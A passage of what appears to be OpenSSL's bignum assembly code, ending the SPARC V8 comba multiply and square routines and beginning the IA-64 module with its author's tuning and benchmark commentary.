addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_5,b_3,t_1 !mul_add_c(a[5],b[3],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
umul a_4,b_4,t_1 !mul_add_c(a[4],b[4],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_3,b_5,t_1 !mul_add_c(a[3],b[5],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_2,b_6,t_1 !=!mul_add_c(a[2],b[6],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_1,b_7,t_1 !mul_add_c(a[1],b[7],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
st c_3,rp(8) !r[8]=c3;
umul a_2,b_7,t_1 !mul_add_c(a[2],b[7],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
umul a_3,b_6,t_1 !=!mul_add_c(a[3],b[6],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_4,b_5,t_1 !mul_add_c(a[4],b[5],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
umul a_5,b_4,t_1 !mul_add_c(a[5],b[4],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_6,b_3,t_1 !mul_add_c(a[6],b[3],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_7,b_2,t_1 !=!mul_add_c(a[7],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(9) !r[9]=c1;
umul a_7,b_3,t_1 !mul_add_c(a[7],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
umul a_6,b_4,t_1 !mul_add_c(a[6],b[4],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_5,b_5,t_1 !=!mul_add_c(a[5],b[5],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
umul a_4,b_6,t_1 !mul_add_c(a[4],b[6],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_3,b_7,t_1 !mul_add_c(a[3],b[7],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(10) !r[10]=c2;
umul a_4,b_7,t_1 !=!mul_add_c(a[4],b[7],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2 !=
umul a_5,b_6,t_1 !mul_add_c(a[5],b[6],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
umul a_6,b_5,t_1 !mul_add_c(a[6],b[5],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_7,b_4,t_1 !mul_add_c(a[7],b[4],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(11) !r[11]=c3;
addx c_2,%g0,c_2 !=
umul a_7,b_5,t_1 !mul_add_c(a[7],b[5],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
umul a_6,b_6,t_1 !mul_add_c(a[6],b[6],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_5,b_7,t_1 !mul_add_c(a[5],b[7],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
st c_1,rp(12) !r[12]=c1;
addx c_3,%g0,c_3 !=
umul a_6,b_7,t_1 !mul_add_c(a[6],b[7],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3 !=
addx %g0,%g0,c_1
umul a_7,b_6,t_1 !mul_add_c(a[7],b[6],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(13) !r[13]=c2;
umul a_7,b_7,t_1 !=!mul_add_c(a[7],b[7],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
nop !=
st c_3,rp(14) !r[14]=c3;
st c_1,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0
.type bn_mul_comba8,#function
.size bn_mul_comba8,(.-bn_mul_comba8)
.align 32
.global bn_mul_comba4
/*
 * void bn_mul_comba4(r,a,b)
 * BN_ULONG *r,*a,*b;
 *
 * 4x4-word comba multiplication: r[0..7] = a[0..3] * b[0..3].
 * Same column-accumulation scheme as bn_mul_comba8 above, with
 * c_1/c_2/c_3 rotating as the three-word column accumulator.
 */
bn_mul_comba4:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
ld bp(0),b_0
umul a_0,b_0,c_1 !=!mul_add_c(a[0],b[0],c1,c2,c3);
ld bp(1),b_1
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
umul a_0,b_1,t_1 !=!mul_add_c(a[0],b[1],c2,c3,c1);
ld ap(1),a_1
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc %g0,t_2,c_3
addx %g0,%g0,c_1
ld ap(2),a_2
umul a_1,b_0,t_1 !=!mul_add_c(a[1],b[0],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(1) !r[1]=c2;
umul a_2,b_0,t_1 !mul_add_c(a[2],b[0],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
ld bp(2),b_2
umul a_1,b_1,t_1 !=!mul_add_c(a[1],b[1],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
ld bp(3),b_3
umul a_0,b_2,t_1 !mul_add_c(a[0],b[2],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
st c_3,rp(2) !r[2]=c3;
umul a_0,b_3,t_1 !=!mul_add_c(a[0],b[3],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3 !=
umul a_1,b_2,t_1 !mul_add_c(a[1],b[2],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
ld ap(3),a_3
umul a_2,b_1,t_1 !mul_add_c(a[2],b[1],c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_3,b_0,t_1 !=!mul_add_c(a[3],b[0],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_3,b_1,t_1 !mul_add_c(a[3],b[1],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
umul a_2,b_2,t_1 !mul_add_c(a[2],b[2],c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
umul a_1,b_3,t_1 !=!mul_add_c(a[1],b[3],c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(4) !r[4]=c2;
umul a_2,b_3,t_1 !mul_add_c(a[2],b[3],c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
umul a_3,b_2,t_1 !mul_add_c(a[3],b[2],c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(5) !r[5]=c3;
addx c_2,%g0,c_2 !=
umul a_3,b_3,t_1 !mul_add_c(a[3],b[3],c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
st c_1,rp(6) !r[6]=c1;
st c_2,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_mul_comba4,#function
.size bn_mul_comba4,(.-bn_mul_comba4)
.align 32
.global bn_sqr_comba8
/*
 * void bn_sqr_comba8(r,a)
 * BN_ULONG *r,*a;
 *
 * 8-word comba squaring: r[0..15] = a[0..7]^2.  Cross products
 * a[i]*a[j] (i!=j) are computed once and accumulated twice
 * (sqr_add_c2: the addcc/addxcc/addx chain is repeated); square
 * terms a[i]*a[i] are accumulated once (sqr_add_c).
 */
bn_sqr_comba8:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
ld ap(1),a_1
umul a_0,a_0,c_1 !=!sqr_add_c(a,0,c1,c2,c3);
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
ld ap(2),a_2
umul a_0,a_1,t_1 !=!sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc %g0,t_2,c_3
addx %g0,%g0,c_1 !=
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3
st c_2,rp(1) !r[1]=c2;
addx c_1,%g0,c_1 !=
umul a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx %g0,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
ld ap(3),a_3
umul a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
st c_3,rp(2) !r[2]=c3;
umul a_0,a_3,t_1 !=!sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3 !=
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
ld ap(4),a_4
addx c_3,%g0,c_3 !=
umul a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_4,a_0,t_1 !sqr_add_c2(a,4,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
ld ap(5),a_5
umul a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
st c_2,rp(4) !r[4]=c2;
addx c_1,%g0,c_1 !=
umul a_0,a_5,t_1 !sqr_add_c2(a,5,0,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx %g0,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
umul a_1,a_4,t_1 !sqr_add_c2(a,4,1,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
ld ap(6),a_6
umul a_2,a_3,t_1 !sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
st c_3,rp(5) !r[5]=c3;
umul a_6,a_0,t_1 !sqr_add_c2(a,6,0,c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx %g0,%g0,c_3
addcc c_1,t_1,c_1 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_5,a_1,t_1 !sqr_add_c2(a,5,1,c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
addcc c_1,t_1,c_1 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
umul a_4,a_2,t_1 !sqr_add_c2(a,4,2,c1,c2,c3);
addcc c_1,t_1,c_1 !=
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
addcc c_1,t_1,c_1 !=
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3
ld ap(7),a_7
umul a_3,a_3,t_1 !=!sqr_add_c(a,3,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(6) !r[6]=c1;
umul a_0,a_7,t_1 !sqr_add_c2(a,7,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_1,a_6,t_1 !sqr_add_c2(a,6,1,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_2,a_5,t_1 !sqr_add_c2(a,5,2,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_3,a_4,t_1 !sqr_add_c2(a,4,3,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
st c_2,rp(7) !r[7]=c2;
umul a_7,a_1,t_1 !sqr_add_c2(a,7,1,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
addcc c_3,t_1,c_3 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_6,a_2,t_1 !sqr_add_c2(a,6,2,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
addcc c_3,t_1,c_3 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_5,a_3,t_1 !sqr_add_c2(a,5,3,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
addcc c_3,t_1,c_3 !=
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_4,a_4,t_1 !sqr_add_c(a,4,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(8) !r[8]=c3;
addx c_2,%g0,c_2 !=
umul a_2,a_7,t_1 !sqr_add_c2(a,7,2,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_3,a_6,t_1 !sqr_add_c2(a,6,3,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_4,a_5,t_1 !sqr_add_c2(a,5,4,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(9) !r[9]=c1;
umul a_7,a_3,t_1 !sqr_add_c2(a,7,3,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_6,a_4,t_1 !sqr_add_c2(a,6,4,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_5,a_5,t_1 !sqr_add_c(a,5,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(10) !r[10]=c2;
umul a_4,a_7,t_1 !=!sqr_add_c2(a,7,4,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2 !=
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2
umul a_5,a_6,t_1 !=!sqr_add_c2(a,6,5,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx c_2,%g0,c_2 !=
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
st c_3,rp(11) !r[11]=c3;
addx c_2,%g0,c_2 !=
umul a_7,a_5,t_1 !sqr_add_c2(a,7,5,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_6,a_6,t_1 !sqr_add_c(a,6,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
st c_1,rp(12) !r[12]=c1;
umul a_6,a_7,t_1 !sqr_add_c2(a,7,6,c2,c3,c1);
addcc c_2,t_1,c_2 !=
rd %y,t_2
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2 !=
addxcc c_3,t_2,c_3
st c_2,rp(13) !r[13]=c2;
addx c_1,%g0,c_1 !=
umul a_7,a_7,t_1 !sqr_add_c(a,7,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1 !=
st c_3,rp(14) !r[14]=c3;
st c_1,rp(15) !r[15]=c1;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba8,#function
.size bn_sqr_comba8,(.-bn_sqr_comba8)
.align 32
.global bn_sqr_comba4
/*
 * void bn_sqr_comba4(r,a)
 * BN_ULONG *r,*a;
 *
 * 4-word comba squaring: r[0..7] = a[0..3]^2.  Cross products are
 * computed once and accumulated twice (sqr_add_c2); squares once
 * (sqr_add_c).  Same accumulator rotation as bn_sqr_comba8.
 */
bn_sqr_comba4:
save %sp,FRAME_SIZE,%sp
ld ap(0),a_0
umul a_0,a_0,c_1 !sqr_add_c(a,0,c1,c2,c3);
ld ap(1),a_1 !=
rd %y,c_2
st c_1,rp(0) !r[0]=c1;
ld ap(2),a_2
umul a_0,a_1,t_1 !=!sqr_add_c2(a,1,0,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2
addxcc %g0,t_2,c_3
addx %g0,%g0,c_1 !=
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1 !=
st c_2,rp(1) !r[1]=c2;
umul a_2,a_0,t_1 !sqr_add_c2(a,2,0,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2 !=
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1 !=
addx c_2,%g0,c_2
ld ap(3),a_3
umul a_1,a_1,t_1 !sqr_add_c(a,1,c3,c1,c2);
addcc c_3,t_1,c_3 !=
rd %y,t_2
addxcc c_1,t_2,c_1
st c_3,rp(2) !r[2]=c3;
addx c_2,%g0,c_2 !=
umul a_0,a_3,t_1 !sqr_add_c2(a,3,0,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx %g0,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
umul a_1,a_2,t_1 !sqr_add_c2(a,2,1,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
addx c_3,%g0,c_3
addcc c_1,t_1,c_1
addxcc c_2,t_2,c_2
addx c_3,%g0,c_3 !=
st c_1,rp(3) !r[3]=c1;
umul a_3,a_1,t_1 !sqr_add_c2(a,3,1,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx %g0,%g0,c_1
addcc c_2,t_1,c_2
addxcc c_3,t_2,c_3 !=
addx c_1,%g0,c_1
umul a_2,a_2,t_1 !sqr_add_c(a,2,c2,c3,c1);
addcc c_2,t_1,c_2
rd %y,t_2 !=
addxcc c_3,t_2,c_3
addx c_1,%g0,c_1
st c_2,rp(4) !r[4]=c2;
umul a_2,a_3,t_1 !=!sqr_add_c2(a,3,2,c3,c1,c2);
addcc c_3,t_1,c_3
rd %y,t_2
addxcc c_1,t_2,c_1
addx %g0,%g0,c_2 !=
addcc c_3,t_1,c_3
addxcc c_1,t_2,c_1
st c_3,rp(5) !r[5]=c3;
addx c_2,%g0,c_2 !=
umul a_3,a_3,t_1 !sqr_add_c(a,3,c1,c2,c3);
addcc c_1,t_1,c_1
rd %y,t_2
addxcc c_2,t_2,c_2 !=
st c_1,rp(6) !r[6]=c1;
st c_2,rp(7) !r[7]=c2;
ret
restore %g0,%g0,%o0
.type bn_sqr_comba4,#function
.size bn_sqr_comba4,(.-bn_sqr_comba4)
.align 32
/* ==================================================================== */
/* End of the SPARC V8 module.  What follows is a different module      */
/* concatenated into this file: crypto/bn/asm/ia64.S (IA-64 ISA).       */
/* ==================================================================== */
.explicit
.text
.ident "ia64.S, Version 2.1"
.ident "IA-64 ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
//
// ====================================================================
// Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
// project.
//
// Rights for redistribution and usage in source and binary forms are
// granted according to the OpenSSL license. Warranty of any kind is
// disclaimed.
// ====================================================================
//
// Version 2.x is Itanium2 re-tune. Few words about how Itanum2 is
// different from Itanium to this module viewpoint. Most notably, is it
// "wider" than Itanium? Can you experience loop scalability as
// discussed in commentary sections? Not really:-( Itanium2 has 6
// integer ALU ports, i.e. it's 2 ports wider, but it's not enough to
// spin twice as fast, as I need 8 IALU ports. Amount of floating point
// ports is the same, i.e. 2, while I need 4. In other words, to this
// module Itanium2 remains effectively as "wide" as Itanium. Yet it's
// essentially different in respect to this module, and a re-tune was
// required. Well, because some intruction latencies has changed. Most
// noticeably those intensively used:
//
// Itanium Itanium2
// ldf8 9 6 L2 hit
// ld8 2 1 L1 hit
// getf 2 5
// xma[->getf] 7[+1] 4[+0]
// add[->st8] 1[+1] 1[+0]
//
// What does it mean? You might ratiocinate that the original code
// should run just faster... Because sum of latencies is smaller...
// Wrong! Note that getf latency increased. This means that if a loop is
// scheduled for lower latency (as they were), then it will suffer from
// stall condition and the code will therefore turn anti-scalable, e.g.
// original bn_mul_words spun at 5*n or 2.5 times slower than expected
// on Itanium2! What to do? Reschedule loops for Itanium2? But then
// Itanium would exhibit anti-scalability. So I've chosen to reschedule
// for worst latency for every instruction aiming for best *all-round*
// performance.
// Q. How much faster does it get?
// A. Here is the output from 'openssl speed rsa dsa' for vanilla
// 0.9.6a compiled with gcc version 2.96 20000731 (Red Hat
// Linux 7.1 2.96-81):
//
// sign verify sign/s verify/s
// rsa 512 bits 0.0036s 0.0003s 275.3 2999.2
// rsa 1024 bits 0.0203s 0.0011s 49.3 894.1
// rsa 2048 bits 0.1331s 0.0040s 7.5 250.9
// rsa 4096 bits 0.9270s 0.0147s 1.1 68.1
// sign verify sign/s verify/s
// dsa 512 bits 0.0035s 0.0043s 288.3 234.8
// dsa 1024 bits 0.0111s 0.0135s 90.0 74.2
//
// And here is similar output but for this assembler
// implementation:-)
//
// sign verify sign/s verify/s
// rsa 512 bits 0.0021s 0.0001s 549.4 9638.5
// rsa 1024 bits 0.0055s 0.0002s 183.8 4481.1
// rsa 2048 bits 0.0244s 0.0006s 41.4 1726.3
// rsa 4096 bits 0.1295s 0.0018s 7.7 561.5
// sign verify sign/s verify/s
// dsa 512 bits 0.0012s 0.0013s 891.9 756.6
// dsa 1024 bits 0.0023s 0.0028s 440.4 376.2
//
// Yes, you may argue that it's not fair comparison as it's
// possible to craft the C implementation with BN_UMULT_HIGH
// inline assembler macro. But of course! Here is the output
// with the macro:
//
// sign verify sign/s verify/s
// rsa 512 bits 0.0020s 0.0002s 495.0 6561.0
// rsa 1024 bits 0.0086s 0.0004s 116.2 2235.7
// rsa 2048 bits 0.0519s 0.0015s 19.3 667.3
// rsa 4096 bits 0.3464s 0.0053s 2.9 187.7
// sign verify sign/s verify/s
// dsa 512 bits 0.0016s 0.0020s 613.1 510.5
// dsa 1024 bits 0.0045s 0.0054s 221.0 183.9
//
// My code is still way faster, huh:-) And I believe that even
// higher performance can be achieved. Note that as keys get
// longer, performance gain is larger. Why? According to the
// profiler there is another player in the field, namely
// BN_from_montgomery consuming larger and larger portion of CPU
// time as keysize decreases. I therefore consider putting effort
// to assembler implementation of the following routine:
//
// void bn_mul_add_mont (BN_ULONG *rp,BN_ULONG *np,int nl,BN_ULONG n0)
// {
// int i,j;
// BN_ULONG v;
//
// for (i=0; i<nl; i++)
// {
// v=bn_mul_add_words(rp,np,nl,(rp[0]*n0)&BN_MASK2);
// nrp++;
// rp++;
// if (((nrp[-1]+=v)&BN_MASK2) < v)
// for (j=0; ((++nrp[j])&BN_MASK2) == 0; j++) ;
// }
// }
//
// It might as well be beneficial to implement even combaX
// variants, as it appears as it can literally unleash the
// performance (see comment section to bn_mul_comba8 below).
//
// And finally for your reference the output for 0.9.6a compiled
// with SGIcc version 0.01.0-12 (keep in mind that for the moment
// of this writing it's not possible to convince SGIcc to use
// BN_UMULT_HIGH inline assembler macro, yet the code is fast,
// i.e. for a compiler generated one:-):
//
// sign verify sign/s verify/s
// rsa 512 bits 0.0022s 0.0002s 452.7 5894.3
// rsa 1024 bits 0.0097s 0.0005s 102.7 2002.9
// rsa 2048 bits 0.0578s 0.0017s 17.3 600.2
// rsa 4096 bits 0.3838s 0.0061s 2.6 164.5
// sign verify sign/s verify/s
// dsa 512 bits 0.0018s 0.0022s 547.3 459.6
// dsa 1024 bits 0.0051s 0.0062s 196.6 161.3
//
// Oh! Benchmarks were performed on 733MHz Lion-class Itanium
// system running Redhat Linux 7.1 (very special thanks to Ray
// McCaffity of Williams Communications for providing an account).
//
// Q. What's the heck with 'rum 1<<5' at the end of every function?
// A. Well, by clearing the "upper FP registers written" bit of the
// User Mask I want to excuse the kernel from preserving upper
// (f32-f128) FP register bank over process context switch, thus
// minimizing bus bandwidth consumption during the switch (i.e.
// after PKI opration completes and the program is off doing
// something else like bulk symmetric encryption). Having said
// this, I also want to point out that it might be good idea
// to compile the whole toolkit (as well as majority of the
// programs for that matter) with -mfixed-range=f32-f127 command
// line option. No, it doesn't prevent the compiler from writing
// to upper bank, but at least discourages to do so. If you don't
// like the idea you have the option to compile the module with
// -Drum=nop.m in command line.
//
#if defined(_HPUX_SOURCE) && !defined(_LP64)
#define ADDP addp4
#else
#define ADDP add
#endif
#if 1
//
// bn_[add|sub]_words routines.
//
// Loops are spinning in 2*(n+5) ticks on Itanuim (provided that the
// data reside in L1 cache, i.e. 2 ticks away). It's possible to
// compress the epilogue and get down to 2*n+6, but at the cost of
// scalability (the neat feature of this implementation is that it
// shall automagically spin in n+5 on "wider" IA-64 implementations:-)
// I consider that the epilogue is short enough as it is to trade tiny
// performance loss on Itanium for scalability.
//
